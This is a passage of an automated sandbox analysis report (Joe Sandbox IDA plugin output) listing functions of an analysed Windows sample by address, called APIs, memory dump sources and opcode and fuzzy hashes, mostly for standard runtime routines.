                                                                                                                                • Opcode ID: 77d7de772ae6a1290ed9834418c030efa9d6ccbb64528a68dca8826862516094
                                                                                                                                • Instruction ID: 8e299772b2840dbf3efc78422cdc8166df5197bd1138606caa4b9d73b934c6f8
                                                                                                                                • Opcode Fuzzy Hash: 77d7de772ae6a1290ed9834418c030efa9d6ccbb64528a68dca8826862516094
                                                                                                                                • Instruction Fuzzy Hash: 9C81F763A0C982AAEB75AF26D00517BF791FB4A760F984035C74D43680EEBDE54CC320
                                                                                                                                Function 00007FF712773778 Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3548387204-0
                                                                                                                                • Opcode ID: 78340a4773d28b5b3b4d3956d34de224723ef3ecf892ad03741a19342b2a140a
                                                                                                                                • Instruction ID: 703bec74328c579d4f7f1c7f87da3159128fd317736ea63abb5ee74aa2460371
                                                                                                                                • Opcode Fuzzy Hash: 78340a4773d28b5b3b4d3956d34de224723ef3ecf892ad03741a19342b2a140a
                                                                                                                                • Instruction Fuzzy Hash: B811DC40E0890341FA1433B0646B2BB82908F5F365FC00438E70DAA2C3AEEDB84DDA76
                                                                                                                                Function 00007FF712786F68 Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF71277C9C2), ref: 00007FF712786F7C
                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF71277C9C2), ref: 00007FF712786FE6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EnvironmentStrings$Free
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3328510275-0
                                                                                                                                • Opcode ID: d61b3a01354a4cd7a691c2d106ae63e9dd6998c3237c42bf398094da1a31aa7d
                                                                                                                                • Instruction ID: 46c478fb3bbee9958829ff212b2b0b05dbdd767b710c4717051935a147363812
                                                                                                                                • Opcode Fuzzy Hash: d61b3a01354a4cd7a691c2d106ae63e9dd6998c3237c42bf398094da1a31aa7d
                                                                                                                                • Instruction Fuzzy Hash: 7F01A111E18F6185EA24BB12641202BA260AB5ABF0B884634EF6D177D5DE6CE84AC360
                                                                                                                                Function 00007FF71278149C Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseErrorHandleLast
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 918212764-0
                                                                                                                                • Opcode ID: a278e31c0c0b3efc51ed99217641f3d5b30a632b74c31a2da611b930d468b64a
                                                                                                                                • Instruction ID: f7f4f6bd92b398e00d3350603fe52bfcf8a2c6e38a23526ee66c49bf75d362d4
                                                                                                                                • Opcode Fuzzy Hash: a278e31c0c0b3efc51ed99217641f3d5b30a632b74c31a2da611b930d468b64a
                                                                                                                                • Instruction Fuzzy Hash: A521CF20B08E9241EBA4B764A49637ED2C15F8A7B4F844235EB2E477C1DEECE45CC230
                                                                                                                                Function 00007FF71277CDB6 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3947729631-0
                                                                                                                                • Opcode ID: ec2e625380941a45671745544d02a38661e6b2e9d8a39f80ea1396c7c00dcf14
                                                                                                                                • Instruction ID: 7ffcca1956e081267163e15ddf5602c704dd6675f77065cf5f5bd53e1bdea495
                                                                                                                                • Opcode Fuzzy Hash: ec2e625380941a45671745544d02a38661e6b2e9d8a39f80ea1396c7c00dcf14
                                                                                                                                • Instruction Fuzzy Hash: 9B216131E04F0289EB60BB7484892BD77A4EB0E328F84163DDB5D066D5DFB8948DC760
                                                                                                                                Function 00007FF71278A5D0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                • Opcode ID: 47fcc5eb06481042441da6cfd58a272eacd0ecc1c94da9c063df195aac6ec2b8
                                                                                                                                • Instruction ID: 83e91367f8e2460db1a606303c177ab97a9f67019b47362bdf1564094dc69c0c
                                                                                                                                • Opcode Fuzzy Hash: 47fcc5eb06481042441da6cfd58a272eacd0ecc1c94da9c063df195aac6ec2b8
                                                                                                                                • Instruction Fuzzy Hash: E121B332608A8286D760BF18D44137AB7A0EB99BA4F944234E75D476D9DF7CD45CCB10
                                                                                                                                Function 00007FF71277B6E0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                • Opcode ID: d699ace951f14fdf64431f85461304cb917bf26456254af4fc2d594a1fe7d74f
                                                                                                                                • Instruction ID: 5c5d648520ab2f39b071c4bc35274563db21f6c588d834622e731a52d272f812
                                                                                                                                • Opcode Fuzzy Hash: d699ace951f14fdf64431f85461304cb917bf26456254af4fc2d594a1fe7d74f
                                                                                                                                • Instruction Fuzzy Hash: E9119621A0CE4581EA50BF51941417BE2A0AF4EBA4F845431EB4C87786EFFCD51CCB60
                                                                                                                                Function 00007FF712787160 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                • Opcode ID: 0924f0b78979a1a63fcf74ae520b0e57e471b81f3e8340a484761aabe1f935a5
                                                                                                                                • Instruction ID: 77d9ecc7bbd97dc437841e463dfa93be39d75304bd3e36324eb72fc3b6e8df04
                                                                                                                                • Opcode Fuzzy Hash: 0924f0b78979a1a63fcf74ae520b0e57e471b81f3e8340a484761aabe1f935a5
                                                                                                                                • Instruction Fuzzy Hash: ED118E36D18E4282F318BB14A44543BE3A0EB8A760F850434D75E47B95DEBCE42DC720
                                                                                                                                Function 00007FF712787068 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00007FF7127803C0: HeapAlloc.KERNEL32(?,?,00000000,00007FF71277FEA7), ref: 00007FF712780415
                                                                                                                                • InitializeCriticalSectionEx.KERNEL32(?,?,00000000,00007FF712787369,?,?,?,?,?,00007FF71278AC7C), ref: 00007FF7127870AF
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocCriticalHeapInitializeSection
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2538999594-0
                                                                                                                                • Opcode ID: 0324af355b24ed3f96c24bc007edda0c2fd3265141ad72d4f3d0c66460b9e2b1
                                                                                                                                • Instruction ID: 2e93999ce8235b2adbb2c977e2f461f458491e26ac2818545bdf62571c331684
                                                                                                                                • Opcode Fuzzy Hash: 0324af355b24ed3f96c24bc007edda0c2fd3265141ad72d4f3d0c66460b9e2b1
                                                                                                                                • Instruction Fuzzy Hash: 4B11C123728B8582E6149B16D18115EA750F74A7A0FD88635E36E43BC5DF78E47AC710
                                                                                                                                Function 00007FF7127800CC Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __vcrt_uninitialize_ptd
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1180542099-0
                                                                                                                                • Opcode ID: fc07ed4da2af6a14bdea54ecf6624b54e607c27b8fa1a533bb4c639d3d1477c1
                                                                                                                                • Instruction ID: 333952e26d3d089047aa50a3bbf28c63d55f45f2debba48d6cdd6f8cd41f5cf0
                                                                                                                                • Opcode Fuzzy Hash: fc07ed4da2af6a14bdea54ecf6624b54e607c27b8fa1a533bb4c639d3d1477c1
                                                                                                                                • Instruction Fuzzy Hash: F1E0E520D0DD4255EA1A773428871BB96402F2F330FE00535D72D422D2EEDC611CE631
                                                                                                                                Function 00007FF712773D68 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF712773D7C
                                                                                                                                  • Part of subcall function 00007FF7127758E0: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF7127758E8
                                                                                                                                  • Part of subcall function 00007FF7127758E0: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF7127758ED
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1208906642-0
                                                                                                                                • Opcode ID: 6f5e15f92305e6e0ba47c78896a71fbf5e7724418de824e5270b3df5456a1180
                                                                                                                                • Instruction ID: 56265a30c9bc06e810d7456cd7a08f1aa1f12fa8c29d843b7b937741858ce207
                                                                                                                                • Opcode Fuzzy Hash: 6f5e15f92305e6e0ba47c78896a71fbf5e7724418de824e5270b3df5456a1180
                                                                                                                                • Instruction Fuzzy Hash: 11E09214D0D94381FE643722144F2BA82405F2B365FC00478EA49421838F9D315ED572
                                                                                                                                Function 00007FF712782114 Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 544645111-0
                                                                                                                                • Opcode ID: 0bad1824035c984c421925e17e06a9ff2395b13a2119324378511e1baa27230c
                                                                                                                                • Instruction ID: cd93847fd578d0ad28c3f5d3c9c41be2cd45219387066c707c7471edb843b835
                                                                                                                                • Opcode Fuzzy Hash: 0bad1824035c984c421925e17e06a9ff2395b13a2119324378511e1baa27230c
                                                                                                                                • Instruction Fuzzy Hash: 6FD0C925B3594183E304AB11D846BA6A228B799761FC04025F949926948FBCC25DCB20
                                                                                                                                Function 00007FF7127803C0 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                • Opcode ID: d372c71fffb221a83cbde8ea10ba771d5b2feb5002571b443168851f989c780c
                                                                                                                                • Instruction ID: 0624e857f714b3d0edcf64dcabbdde7a38f54c1abe9d42e9767d213a93f2dfb0
                                                                                                                                • Opcode Fuzzy Hash: d372c71fffb221a83cbde8ea10ba771d5b2feb5002571b443168851f989c780c
                                                                                                                                • Instruction Fuzzy Hash: 5FF04F10B49A0645FE66776159562B782806F8F760FCC1434CB0E866C2ED9CE49DC230
                                                                                                                                Function 00007FF712783880 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • HeapAlloc.KERNEL32(?,?,?,00007FF712784F7D,?,?,00000000,00007FF712789EEF,?,?,?,00007FF71277EB93,?,?,?,00007FF71277EA89), ref: 00007FF7127838BE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                • Opcode ID: 47371f6cae0110cecbff56ef59c5b9581ff454716397a254fa36e45a8a85af86
                                                                                                                                • Instruction ID: 3c8a2b43e9a84b1eec40168a9c29595b1ee2e0cd1cb6f546c2184c70d4c2e01b
                                                                                                                                • Opcode Fuzzy Hash: 47371f6cae0110cecbff56ef59c5b9581ff454716397a254fa36e45a8a85af86
                                                                                                                                • Instruction Fuzzy Hash: 03F0D410E09E0785FA557765588727692805F8E7B0FC80A34DF2E962D1EEACA49EC634

                                                                                                                                Non-executed Functions

                                                                                                                                Function 00007FF7127891A4 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 231COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: NameTranslate$CodeInfoLocalePageValid_invalid_parameter_noinfo
                                                                                                                                • String ID: utf8
                                                                                                                                • API String ID: 2487361160-905460609
                                                                                                                                • Opcode ID: 2ee1d30cd41817c388ae3ac86c437be0dd8e4058d26dd38013e33c805d498f74
                                                                                                                                • Instruction ID: bfaa5d5efd13a910919ad7e33b30c17c451ca1a63f155317b1595ec157bb0f29
                                                                                                                                • Opcode Fuzzy Hash: 2ee1d30cd41817c388ae3ac86c437be0dd8e4058d26dd38013e33c805d498f74
                                                                                                                                • Instruction Fuzzy Hash: 9E91B236A08B4285EB60BB62D4426BBB394BB4A7A4F844031DF4C43B85DFBCE55DC321
                                                                                                                                Function 00007FF7127743FC Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                • Opcode ID: 5548b70b0cefbcb525ec7d57d70cede4d447af0874bcaf95fc99744e299bb412
                                                                                                                                • Instruction ID: 91bf1ab4a630b5d25531e0cba74ab04c7a4af6c6b5db2295399f63a3fe92103d
                                                                                                                                • Opcode Fuzzy Hash: 5548b70b0cefbcb525ec7d57d70cede4d447af0874bcaf95fc99744e299bb412
                                                                                                                                • Instruction Fuzzy Hash: 4E313C72608E8186EB60AF60E8547EAB360FB89714F94443ADB4E47B98DF78D54CC720
                                                                                                                                Function 00007FF712789C04 Relevance: 9.2, APIs: 6, Instructions: 171COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Locale$InfoValid$CodeDefaultEnumLocalesPageSystemUser
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3082464267-0
                                                                                                                                • Opcode ID: 3b7b7fe1348dda5d41963e03bf331e2e736922213e052ca7d769a36cffe0b59d
                                                                                                                                • Instruction ID: 85984c7cd02739dfc301af4e109f81f32b1cce8590bf2cb54daf4053289c7eb6
                                                                                                                                • Opcode Fuzzy Hash: 3b7b7fe1348dda5d41963e03bf331e2e736922213e052ca7d769a36cffe0b59d
                                                                                                                                • Instruction Fuzzy Hash: F3718E22B04A02CAEB51BB61D4426BAB2A4BF4E768F844435CB0D53795EFBDA44CC361
                                                                                                                                Function 00007FF71277AD2C Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                • Opcode ID: e2e9e4b08d55766f8489bd1342bb1899f8a505dc099b901336b236e5157fd6eb
                                                                                                                                • Instruction ID: 0052a593527031b8f95409d699dfa974224a9edc7d7ed0fda3d20960f4c830ee
                                                                                                                                • Opcode Fuzzy Hash: e2e9e4b08d55766f8489bd1342bb1899f8a505dc099b901336b236e5157fd6eb
                                                                                                                                • Instruction Fuzzy Hash: 6A415E32608F8186EB20AF25E8453AAB3A0FB89764F900535EB8D42B58DF78C55DCB10
